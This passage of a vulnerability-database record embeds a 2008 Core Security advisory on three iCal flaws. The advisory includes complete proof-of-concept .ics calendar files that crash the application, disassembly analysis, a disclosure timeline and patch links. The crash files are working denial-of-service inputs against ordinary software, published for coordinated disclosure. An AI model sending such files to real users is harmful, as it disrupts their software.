Available through Apple security updates (see vendor information below). \n\n\n*Vendor Information, Solutions and Workarounds*\n\nThe following information was provided by the vendor:\n\n Availability\n\n Apple security updates are available via the Software Update mechanism:\nhttp://support.apple.com/kb/HT1338\n\n Apple security updates are also available for manual download via:\nhttp://www.apple.com/support/downloads/\n\n Cross-References\n\n If you provide cross-referencing information in your advisory please\nlink to the following URL: http://support.apple.com/kb/HT1222\n\n\n*Credits*\n\nThese vulnerabilities were discovered and researched by Rodrigo\nCarvalho, from the Core Security Consulting Services (SCS) team of Core\nSecurity Technologies during Bugweek 2007. Additional research was done\nby Ricardo Narvaja from CORE IMPACT the Exploit Writers Team (EWT). \n\n A client-side attack directed to the end-users of the iCal application\ncan be executed by sending an email with a malicious .ics file\nattachment, by hosting a malicious .ics file on web site and directing\nusers to open it or by injecting a malicous .ics file on a CalDAV\nenabled server to which potential victims are subscribed to update their\ncalendars automatically. In the three reported cases the vulnerabilities\narise from improper validation of input while or after parsing of the\ncalendar file format. \n\n 1) Null pointer de-reference #1 (Bugtraq ID 28629, CVE-2008-2006)\n\n Improper sanitization of integer input may lead to null pointer\ndereference and possibly to an application that loses control of its\nexecution, resulting in a denial of service. \n\n A vulnerable .ics file will contain the following line:\n\n/-----------\n\n RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646\n\n- -----------/\n\n The \u0027COUNT\u0027 value causes an integer overflow, which leads to a null\npointer dereference when iCal tries to use it after the .ics file is\nimported. 
\n\n The following Proof of Concept (PoC) file is provided to demonstrate\nits feasibility, to trigger the bug import a .ics file with the\nfollowing content and then select one of the created events. \n\n/-----------\n\nBEGIN:VCALENDAR\nX-WR-TIMEZONE:America/Buenos_Aires\nPRODID:-//Apple Inc.//iCal 3.0//EN\nCALSCALE:GREGORIAN\nX-WR-CALNAME: Vulnerable\nVERSION:2.0\nX-WR-RELCALID:10DE4203-4FA5-4E23-AE4D-9DAE3157C9E5\nMETHOD:PUBLISH\nBEGIN:VTIMEZONE\nTZID:America/Buenos_Aires\nBEGIN:DAYLIGHT\nTZOFFSETFROM:-0300\nTZOFFSETTO:-0300\nDTSTART:19991003T000000\nRDATE:19991003T000000\nTZNAME:ARST\nEND:DAYLIGHT\nBEGIN:STANDARD\nTZOFFSETFROM:-0300\nTZOFFSETTO:-0300\nDTSTART:20000303T000000\nRDATE:20000303T000000\nRDATE:20001231T210000\nTZNAME:ART\nEND:STANDARD\nEND:VTIMEZONE\nBEGIN:VEVENT\nSEQUENCE:4\nDTSTART;TZID=America/Buenos_Aires:20071225T110000\nDURATION:PT1H\nUID:48878014-5F03-43E5-8639-61E708714F9A\nDTSTAMP:20071213T130632Z\nSUMMARY:Vuln\nCREATED:20071213T130611Z\nRRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646\nEND:VEVENT\nEND:VCALENDAR\n\n- -----------/\n\n Analysis of the vulnerability\n\n The above proof-of-concept file creates new events in the iCal\napplication . When a user double-clicks on these events the program\ncrashes writing in the memory pointed by pointer \u0027EDI=0\u0027. Only the value\nof \u0027EAX\u0027 is under control, must be less than \u00270x7fffffff\u0027 and is\nextracted from the following line of the PoC \u0027.ics\u0027 file. 
\n\n/-----------\n\nRRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 (0x7FFFFFFE)\n- -----------/\n\n\n\n/-----------\n\n__text:0013C178 push ebp\n__text:0013C179 mov ebp, esp\n__text:0013C17B sub esp, 38h\n__text:0013C17E mov eax, ds:off_1F435C\n__text:0013C183 mov [ebp+var_4], edi\n__text:0013C186 mov edi, [ebp+arg_C]\n__text:0013C189 mov [ebp+var_8], esi\n__text:0013C18C mov esi, [ebp+arg_8]\n__text:0013C18F mov [ebp+var_C], ebx\n__text:0013C192 mov [esp+38h+var_34], eax\n__text:0013C196 mov eax, [ebp+arg_0]\n__text:0013C199 mov [esp+38h+var_28], 0\n__text:0013C1A1 mov [esp+38h+var_2C], 0\n\n- -----------/\n\n Here is written on \u0027[ebp + var28]\u0027 and \u0027[ebp + var2C]\u0027 and because\n\u0027EBP\u0027 is \u0027ESP\u0027 minus \u00270x38\u0027, this is similar to\n\n/-----------\n\n[ebp + var28] = [esp+0x38+var_28]\n[ebp + var2C] = [esp+0x38+var_2C]\n\n- -----------/\n\n There are located the null-pointers on the stack. \n\n/-----------\n\nBFFFEF7C var_2C dd 0\nBFFFEF80 var_28 dd 0\n\n- -----------/\n\n Upon reaching the function where the crash occurs. \n\n/-----------\n\n__text:0014ADC3 push ebp\n__text:0014ADC4 mov ebp, esp\n__text:0014ADC6 sub esp, 48h\n__text:0014ADC9 mov eax, ds:stru_1FA2A0.superclass\n\n- -----------/\n\n Logically the zeros are still present because don\u0027t work with those\nvalues until we enter. \n\n/-----------\n\nBFFFEF7C arg_C dd 0\nBFFFEF80 arg_10 dd 0\n\n- -----------/\n\n We see that the function argument \u0027arg_C\u0027 is loaded and moved to \u0027EDI\u0027. \n\n/-----------\n\n0014ADE0 mov edi, [ebp+arg_C]\n\n- -----------/\n\n And this is the location where is written at the moment of crashing\nfurther ahead, meaning that it is a zero that can\u0027t be changed. \n\n/-----------\n\n0014AE2F mov dword ptr [edi], 0\n\n- -----------/\n\n When getting closer to the point of crash because we control \u0027EAX\u0027 and\nwe can trigger a jump after comparing with \u0027[ebx+0Ch]\u0027 and \u0027[ebx+08h]\u0027. 
\n\n/-----------\n\n0014AE20 cmp eax, [ebx+0Ch] (if it is lower than 1)\n0014AE23 jl short loc_14AE2F\n\n0014AE25 cmp eax, [ebx+8] (if it is lower than 0x270F)\n0014AE2D jle short loc_14AE37\n\n\n169280B8 dd 270Fh (ebx+08)\n169280BC dd 1\t \t (ebx+0C)\n\n- -----------/\n\n The first comparison for \u0027JL\u0027 doesn\u0027t avoid the crash zone, but anyway\nnegative numbers can\u0027t be inserted by default and a zero value does not\ncrash the program or even gets it near the critical zone. Any other\nvalue crashes the application when writing in the null location. \n\n In the other case a comparison is made such that if \u0027EAX\u0027 is less than\n\u00270x270f\u0027 the crash zone is avoided and the program continues to work\nwithout problem. Negative values are not read and if a value greater\nthan \u00270x7fffffff\u0027 the maximum value is used instead. \n\n 2) Null pointer dereference #2 (Bugtraq ID 28632, CVE-2008-2006)\n\n A vulnerable .ics file will contain the following line:\n\n/-----------\n\nTRIGGER:-PT65535H\n\n- -----------/\n\n The \u0027TRIGGER\u0027 value causes a null pointer dereference when iCal tries\nto use it after the .ics file is imported. \n\n The corresponding PoC follows. to trigger the bug import a .ics file\nwith the following content then click on the 65535 on edit mode and\naccept it without changes. 
\n\n/-----------\n\nBEGIN:VCALENDAR\nX-WR-CALNAME:Fake event\nPRODID:-//Apple Inc.//iCal 3.0//EN\nCALSCALE:GREGORIAN\nVERSION:2.0\nMETHOD:PUBLISH\nBEGIN:VTIMEZONE\nTZID:America/Buenos_Aires\nBEGIN:DAYLIGHT\nTZOFFSETFROM:-0300\nTZOFFSETTO:-0300\nDTSTART:19991003T000000\nRDATE:19991003T000000\nTZNAME:ARST\nEND:DAYLIGHT\nBEGIN:STANDARD\nTZOFFSETFROM:-0300\nTZOFFSETTO:-0300\nDTSTART:20000303T000000\nRDATE:20000303T000000\nRDATE:20001231T210000\nTZNAME:ART\nEND:STANDARD\nEND:VTIMEZONE\nBEGIN:VEVENT\nSEQUENCE:10\nDTSTART;TZID=America/Buenos_Aires:20071225T000000\nDTSTAMP:20071213T124414Z\nSUMMARY:Fake Event\nDTEND;TZID=America/Buenos_Aires:20071225T010000\nRRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1\nUID:651D31BE-455E-45ED-99C6-55B9F03A3FA9\nTRANSP:OPAQUE\nCREATED:20071213T124215Z\nBEGIN:VALARM\nX-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49\nACTION:DISPLAY\nDESCRIPTION:Event reminder\nTRIGGER:-PT65535H\nEND:VALARM\nEND:VEVENT\nEND:VCALENDAR\n\n- -----------/\n\n 3) Improper resource liberation (Bugtraq ID 28633, CVE-2008-2007)\n\n This is another case of bad validation of a file with the iCalendar\nformat that results in a more serious bug. \n\n A vulnerable .ics file will contain the following line:\n\n/-----------\n\nATTACH;VALUE=URI:S=osumi\n\n- -----------/\n\n The corresponding PoC follows. Double-click on the .ics file with the\nfollowing content, an event will be created. To crash iCal click on the\nnewly created event and the on the alarm sound list. 
\n\n/-----------\n\nBEGIN:VCALENDAR\nX-WR-TIMEZONE:America/Buenos_Aires\nPRODID:-//Apple Inc.//iCal 3.0//EN\nCALSCALE:GREGORIAN\nX-WR-CALNAME:evento falso\nVERSION:2.0\nX-WR-RELCALID:71CE8EAD-380B-4EA3-A123-60F9B2A03990\nMETHOD:PUBLISH\nBEGIN:VTIMEZONE\nTZID:America/Buenos_Aires\nBEGIN:DAYLIGHT\nTZOFFSETFROM:-0300\nTZOFFSETTO:-0300\nDTSTART:19991003T000000\nRDATE:19991003T000000\nTZNAME:ARST\nEND:DAYLIGHT\nBEGIN:STANDARD\nTZOFFSETFROM:-0300\nTZOFFSETTO:-0300\nDTSTART:20000303T000000\nRDATE:20000303T000000\nRDATE:20001231T210000\nTZNAME:ART\nEND:STANDARD\nEND:VTIMEZONE\nBEGIN:VEVENT\nSEQUENCE:11\nDTSTART;TZID=America/Buenos_Aires:20071225T000000\nDTSTAMP:20071213T143420Z\nSUMMARY:evento falso\nDTEND;TZID=America/Buenos_Aires:20071225T010000\nLOCATION:donde se hace\nRRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1\nTRANSP:OPAQUE\nUID:651D31BE-455E-45ED-99C6-55B9F03A3FA9\nURL;VALUE=URI:http://pepe.com:443/pepe\nATTACH;FMTTYPE=text/php;X-APPLE-CACHED=1:ical://attachments/4E3646DE-ED2\n0-449C-88E7-744E62BC8C12/651D31BE-455E-45ED-99C6-55B9F03A3FA9/popote.php\n\nCREATED:20071213T142720Z\nCREATED:20071213T124215Z\nBEGIN:VALARM\nX-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49\nACTION:DISPLAY\nDESCRIPTION:Event reminder\nTRIGGER:-PT15H\nEND:VALARM\nBEGIN:VALARM\nX-WR-ALARMUID:F54A0E05-57B8-4562-8E77-056B19305CD0\nACTION:AUDIO\nTRIGGER:-PT15M\nATTACH;VALUE=URI:S=osumi\nEND:VALARM\nEND:VEVENT\nEND:VCALENDAR\n\n- -----------/\n\n\n\n\n*Report Timeline*\n\n. 2008-01-30:\n Core sends an initial notification that vulnerabilities were\ndiscovered in the iCal application and iCal server and that an advisory\ndraft is available. 2008-01-31:\n Vendor acknowledges and requests the draft. 2008-01-31:\n Core sends the draft, including proof-of-concept files that trigger\nthe bugs. 2008-02-12:\n Core requests update info on the vulnerabilities and states that\nwants to coordinate the date of the disclosure. 2008-02-18:\n Core requests update info on the vulnerabilities. 
2008-02-18:\n Vendor replies that the iCal Server (CVE-2008-1000) vulnerability is\ntracked for a fix in an upcoming update and the vulnerabilities in the\niCal client application will be fixed in an update following the early\nMarch software update. 2008-02-19:\nCore indicated that it will split the report in two security advisories. \nCORE-2008-0123 will address the vulnerability in iCal server\n(CVE-2008-1000) and will be published in coordination with the release\nof the vendor\u0027s March software update. The publication date for the\nsecond advisory, dealing with the three vulnerabilities in\nthe iCal client application, will be coordinated for a date after the\nMarch update unless there are clear indications of the vulnerability\nbeing exploited in the wild, in which case if Core considers that the\ninformation provided in the advisory would help end users to decide how\nto react the advisory would be published sooner as a \"forced release\". 2008-03-03:\nCore requests update info on the vulnerability, a concrete release\nschedule and text for the advisory section called \"Vendor Information,\nSolutions and Workarounds\". 2008-03-04:\n Vendor provides information concerning CVE-2008-1000 and indicates\nthat the bug is in the Wiki server and not the iCal Server. 2008-03-13:\nCore re-schedules the publication to March 24th and requests the vendor\nan update on the coordinated date of disclosure. The remaining three\nvulnerabilities in the iCal client application will be dealt with by a second\nsecurity advisory (CORE-2008-0126) to be published after the release of\nthe March software update. Publication of CORE-2008-0126 is initially\nslated for March 24th 2008 but the final date estimation can be\ndiscussed further with the vendor based on its estimated date for fixes. 2008-03-18:\n APPLE-SA-2008-0318 software update released. 2008-03-18:\n CORE-2008-0123 is published. 
2008-03-18:\nVendor informs that it will track the first two issues as crasher-only\nbugs but still intends to address them. Further details to determine if\nthe null pointer de-reference bugs are exploitable are requested. The\nvendor will continue to track the third as a security bug and estimates\nearly April for the release of the software update that fixes them. \nAdditional timing information will be provided closer to the estimated date. 2008-03-18:\n Core re-schedules the publication to April 7th and indicates that\nshould any new details about the vulnerabilities become available they\nwill be forwarded to the vendor. 2008-04-04:\nCore requests a more precise date of release of the fixes to coordinate\nthe publication and recommends the vendor to consider the three as\nsecurity bugs because it couldn\u0027t be proved that in this case the\ninteger overflows can\u0027t be exploited. 2008-04-07:\n Vendor requests that Core postpone the advisory publication until\nthe fix is available. 2008-04-07:\n Core requests a more precise date of release of the fixes to coordinate\nthe new publication date. 2008-04-07:\n Vendor informs that the estimated date for the update is near the end\nof April. 2008-04-08:\n Core confirms that coordinating the publication of CORE-2008-0126 for\nApril 28th is acceptable. 2008-04-16:\n Core requests an update on the release date of the fixes. 2008-04-17: Vendor states that end of April is still the estimated\ndate and provides more details that explain why the first two bugs are\nbeing considered null-pointer dereference bugs only. A value range\nverification is performed and out-of-range values branch execution flow\nto instructions that assign NULL to a pointer which later triggers a\nnull pointer de-reference that causes the application to crash. The root\ncause of the crash is a NULL pointer de-reference and not an integer\noverflow. 
2008-04-17:\n Core confirms that the two first bugs can be considered crashes due to\nnull-pointer dereference. Upon further research it is confirmed that\ninteger overflows are detected and do not cause the actual crashes. 2008-04-17:\n Vendor asks confirmation that the first two bugs have no security\nrelated consequences. 2008-04-17:\n Core responds that the three bugs still have security related\nconsequences. The first two bugs can be abused to execute denial of\nservice attacks by untrusted and unauthenticated third parties\nspecifically using public server as attack vector. Core considers bugs\nthat allow unauthenticated third parties to be security vulnerabilities. \nCore indicates that exploitation of null pointer de-reference bugs\ncannot be ruled out generically, a statement which could be derived from\nRice\u0027s theorem. 2008-04-25: Core requests an update on the release date of the fixes\nand sends detailed information on the analysis of the first bug. 2008-04-27: Vendor estimates early May as the date of the software\nfixes release. 2008-05-05: Core informs the vendor that it\u0027s re-scheduling the\npublication to May 12th as a final date unless precise information is\ngiven on the release date of the fixes. 2008-05-06: Vendor responds specifying that the fixes are being\nreleased sometime the following week. 2008-05-07: Core states that it is not willing to re-schedule\npublication date unless the vendor commits to a concrete date. 2008-05-10: Vendor asks Core not to publish the advisory before Apple\nsecurity update is available. Vendor indicates that fixes will be\nreleased on May 19th, 2008. 2008-05-10: Given that the vendor has communicated a concrete date,\nCore will discuss re-scheduling (for the fifth time) the publication\ndate of the advisory. 2008-05-12: Core communicates to the vendor that the publication of the\nadvisory is re-scheduled to May 21st, that date is final. 
2008-05-14: Vendor acknowledges reception of the last email and\nappreciates that Core postponed the advisory publication date. 2008-05-20: Core sends the final draft of the advisory to the vendor. 2008-05-21:\n An edited and corrected final version of the advisory is sent to the\nvendor. 2008-05-21: Advisory CORE-2008-0126 is published. \n\n\n\n*References*\n\n[1]\n RFC 2445: Internet Calendaring and Scheduling Core Object\nSpecification (iCalendar) - http://tools.ietf.org/html/rfc2445\n[2] RFC 4791: Calendaring Extensions to WebDAV -\n http://tools.ietf.org/html/rfc4791\n[3] http://www.apple.com/downloads/macosx/calendars/\n[4] iCalShare http://icalshare.com/\n[5] iCalWorld http://www.icalworld.com/\n\n\n*About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://www.coresecurity.com/corelabs/. \n\n\n*About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company\u0027s flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. 
Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\nhttp://www.coresecurity.com. \n\n\n*Disclaimer*\n\nThe contents of this advisory are copyright (c) 2008 Core Security\nTechnologies and (c) 2008 CoreLabs, and may be distributed freely\nprovided that no fee is charged for this distribution and proper credit\nis given. \n\n\n*GPG/PGP Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (MingW32)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niD8DBQFINH0iyNibggitWa0RAtdmAKCf4V+tks7RBYRRa2Bp9IT3LjBoQgCfeff8\nPZO21gkXaFO1pAdxuViw2ys=\n=xZCy\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2008-1035" }, { "db": "JVNDB", "id": "JVNDB-2008-001405" }, { "db": "BID", "id": "29412" }, { "db": "BID", "id": "29486" }, { "db": "VULHUB", "id": "VHN-31160" }, { "db": "PACKETSTORM", "id": "66818" }, { "db": "PACKETSTORM", "id": "66804" }, { "db": "PACKETSTORM", "id": "66599" } ], "trust": 2.52 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-31160", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-31160" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { 
"@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2008-1035", "trust": 2.9 }, { "db": "BID", "id": "29412", "trust": 2.8 }, { "db": "BID", "id": "29486", "trust": 2.8 }, { "db": "USCERT", "id": "TA08-150A", "trust": 2.6 }, { "db": "SECUNIA", "id": "30430", "trust": 2.6 }, { "db": "BID", "id": "28633", "trust": 2.5 }, { "db": "SECTRACK", "id": "1020095", "trust": 1.7 }, { "db": "VUPEN", "id": "ADV-2008-1601", "trust": 1.7 }, { "db": "VUPEN", "id": "ADV-2008-1697", "trust": 1.7 }, { "db": "SECTRACK", "id": "1020138", "trust": 0.8 }, { "db": "USCERT", "id": "SA08-150A", "trust": 0.8 }, { "db": "XF", "id": "42716", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2008-001405", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-200806-030", "trust": 0.7 }, { "db": "CERT/CC", "id": "TA08-150A", "trust": 0.6 }, { "db": "BUGTRAQ", "id": "20080521 CORE-2008-0126: MULTIPLE VULNERABILITIES IN ICAL", "trust": 0.6 }, { "db": "BUGTRAQ", "id": "20080528 RE: CORE-2008-0126: MULTIPLE VULNERABILITIES IN ICAL", "trust": 0.6 }, { "db": "BUGTRAQ", "id": "20080527 RE: CORE-2008-0126: MULTIPLE VULNERABILITIES IN ICAL", "trust": 0.6 }, { "db": "APPLE", "id": "APPLE-SA-2008-05-28", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "66599", "trust": 0.2 }, { "db": "EXPLOIT-DB", "id": "31620", "trust": 0.1 }, { "db": "SEEBUG", "id": "SSVID-84940", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-31160", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "66818", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "66804", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-31160" }, { "db": "BID", "id": "29412" }, { "db": "BID", "id": "29486" }, { "db": "JVNDB", "id": "JVNDB-2008-001405" }, { "db": "PACKETSTORM", "id": "66818" }, { "db": "PACKETSTORM", "id": "66804" }, { "db": "PACKETSTORM", "id": "66599" }, { "db": "CNNVD", "id": "CNNVD-200806-030" }, { "db": "NVD", "id": "CVE-2008-1035" } ] }, "id": "VAR-200805-0584", "iot": { "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-31160" } ], "trust": 0.01 }, "last_update_date": "2024-11-23T20:14:19.047000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Mac OS X 10.5.3", "trust": 0.8, "url": "http://support.apple.com/kb/HT1897" }, { "title": "Mac OS X 10.5.3", "trust": 0.8, "url": "http://support.apple.com/kb/HT1897?viewlocale=ja_JP" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2008-001405" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-94", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-31160" }, { "db": "JVNDB", "id": "JVNDB-2008-001405" }, { "db": "NVD", "id": "CVE-2008-1035" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "http://www.securityfocus.com/bid/28633" }, { "trust": 2.5, "url": "http://www.securityfocus.com/bid/29412" }, { "trust": 2.5, "url": "http://www.securityfocus.com/bid/29486" }, { "trust": 2.5, "url": "http://www.us-cert.gov/cas/techalerts/ta08-150a.html" }, { "trust": 2.5, "url": "http://secunia.com/advisories/30430" }, { "trust": 1.7, "url": "http://lists.apple.com/archives/security-announce/2008//may/msg00001.html" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id?1020095" }, { "trust": 1.7, "url": 
"http://www.coresecurity.com/?action=item\u0026id=2219" }, { "trust": 1.6, "url": "http://jvn.jp/cert/jvnta08-150a/" }, { "trust": 1.4, "url": "http://www.frsirt.com/english/advisories/2008/1601" }, { "trust": 1.4, "url": "http://www.frsirt.com/english/advisories/2008/1697" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/492414/100/0/threaded" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/492638/100/100/threaded" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/492682/100/0/threaded" }, { "trust": 1.1, "url": "http://www.vupen.com/english/advisories/2008/1601" }, { "trust": 1.1, "url": "http://www.vupen.com/english/advisories/2008/1697" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1035" }, { "trust": 0.8, "url": "http://xforce.iss.net/xforce/xfdb/42716" }, { "trust": 0.8, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-1035" }, { "trust": 0.8, "url": "http://securitytracker.com/id?1020138" }, { "trust": 0.8, "url": "http://www.us-cert.gov/cas/alerts/sa08-150a.html" }, { "trust": 0.6, "url": "http://www.apple.com/macosx/" }, { "trust": 0.6, "url": "http://www.securityfocus.com/archive/1/archive/1/492682/100/0/threaded" }, { "trust": 0.6, "url": "http://www.securityfocus.com/archive/1/archive/1/492638/100/100/threaded" }, { "trust": 0.6, "url": "http://www.securityfocus.com/archive/1/archive/1/492414/100/0/threaded" }, { "trust": 0.1, "url": "http://www.coresecurity.com/?action=item\u0026amp;id=2219" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1338?viewlocale=en_us\u003e" }, { "trust": 0.1, "url": "http://www.us-cert.gov/legal.html\u003e" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1897\u003e" }, { "trust": 0.1, "url": "http://www.kb.cert.org/vuls/byid?searchview\u0026query=apple_security_update_2008_003\u003e" }, { "trust": 0.1, "url": "http://www.us-cert.gov/cas/signup.html\u003e." 
}, { "trust": 0.1, "url": "http://www.us-cert.gov/reading_room/securing_browser/\u003e" }, { "trust": 0.1, "url": "http://www.us-cert.gov/cas/techalerts/ta08-150a.html\u003e" }, { "trust": 0.1, "url": "http://secunia.com/advisories/26273/" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/macosxserver1053update.html" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/advisories/18307/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/27093/" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/macosxserver1053comboupdate.html" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/securityupdate2008003ppc.html" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1897" }, { "trust": 0.1, "url": "http://secunia.com/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/macosx1053update.html" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/securityupdate2008003serverppc.html" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/securityupdate2008003serveruniversal.html" }, { "trust": 0.1, "url": "http://secunia.com/advisories/27130/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/30430/" }, { "trust": 0.1, "url": "http://secunia.com/network_software_inspector_2/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/26636/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/28083/" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/securityupdate2008003intel.html" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/macosx1053comboupdate.html" }, { "trust": 0.1, "url": "http://secunia.com/advisories/28081/" }, { "trust": 0.1, "url": "http://secunia.com/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/18008/" }, { "trust": 0.1, "url": 
"http://secunia.com/product/96/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/28323/" }, { "trust": 0.1, "url": "http://tools.ietf.org/html/rfc4791" }, { "trust": 0.1, "url": "http://pepe.com:443/pepe" }, { "trust": 0.1, "url": "http://www.apple.com/downloads/macosx/calendars/" }, { "trust": 0.1, "url": "http://www.icalworld.com/" }, { "trust": 0.1, "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc." }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "http://enigmail.mozdev.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2008-2006" }, { "trust": 0.1, "url": "http://www.coresecurity.com." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2008-1035" }, { "trust": 0.1, "url": "http://www.coresecurity.com/corelabs/." }, { "trust": 0.1, "url": "http://www.coresecurity.com/corelabs/" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1222" }, { "trust": 0.1, "url": "http://tools.ietf.org/html/rfc2445" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2008-2007" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1338" }, { "trust": 0.1, "url": "http://icalshare.com/" } ], "sources": [ { "db": "VULHUB", "id": "VHN-31160" }, { "db": "BID", "id": "29412" }, { "db": "BID", "id": "29486" }, { "db": "JVNDB", "id": "JVNDB-2008-001405" }, { "db": "PACKETSTORM", "id": "66818" }, { "db": "PACKETSTORM", "id": "66804" }, { "db": "PACKETSTORM", "id": "66599" }, { "db": "CNNVD", "id": "CNNVD-200806-030" }, { "db": "NVD", "id": "CVE-2008-1035" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-31160" }, { "db": "BID", "id": "29412" }, { "db": "BID", "id": "29486" }, { "db": "JVNDB", "id": "JVNDB-2008-001405" }, { "db": "PACKETSTORM", "id": "66818" }, { "db": "PACKETSTORM", "id": "66804" }, { "db": "PACKETSTORM", "id": "66599" }, { 
"db": "CNNVD", "id": "CNNVD-200806-030" }, { "db": "NVD", "id": "CVE-2008-1035" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2008-06-03T00:00:00", "db": "VULHUB", "id": "VHN-31160" }, { "date": "2008-05-28T00:00:00", "db": "BID", "id": "29412" }, { "date": "2008-05-28T00:00:00", "db": "BID", "id": "29486" }, { "date": "2008-06-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2008-001405" }, { "date": "2008-05-29T23:21:11", "db": "PACKETSTORM", "id": "66818" }, { "date": "2008-05-29T23:19:06", "db": "PACKETSTORM", "id": "66804" }, { "date": "2008-05-22T06:09:15", "db": "PACKETSTORM", "id": "66599" }, { "date": "2008-05-28T00:00:00", "db": "CNNVD", "id": "CNNVD-200806-030" }, { "date": "2008-06-03T20:32:00", "db": "NVD", "id": "CVE-2008-1035" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-10-11T00:00:00", "db": "VULHUB", "id": "VHN-31160" }, { 